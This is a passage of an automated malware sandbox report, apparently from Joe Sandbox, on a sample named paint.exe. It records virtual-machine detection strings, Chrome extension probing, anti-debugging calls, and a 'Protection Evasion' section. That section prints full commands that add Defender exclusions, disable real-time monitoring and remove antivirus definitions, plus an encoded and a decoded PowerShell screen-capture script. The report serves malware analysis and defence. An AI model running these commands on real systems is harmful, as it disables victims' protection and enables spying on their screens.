              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWt
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport:
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d01qemu-ga
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"TEMR
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: rar.exe, 00000058.00000003.1934045500.0000028E54D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -9a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#3f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: pf_importvmware
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000003.1803090796.00000233D78F9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmsrvc
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f2vmusrvc
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entControlSet\Services\Hyper-V\Linkage"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F0BDD19C
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB029060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB029060
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF34F0 GetProcessHeap,0_2_00007FF6F0BF34F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F0BDD19C
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDD37C SetUnhandledExceptionFilter,0_2_00007FF6F0BDD37C
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F0BEA684
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6F0BDC910
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6F0BDD19C
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDD37C SetUnhandledExceptionFilter,1_2_00007FF6F0BDD37C
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6F0BEA684
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6F0BDC910
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA03028 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAA03028
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,88_2_00007FF623E2B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2B6D8 SetUnhandledExceptionFilter,88_2_00007FF623E2B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,88_2_00007FF623E2A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,88_2_00007FF623E34C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
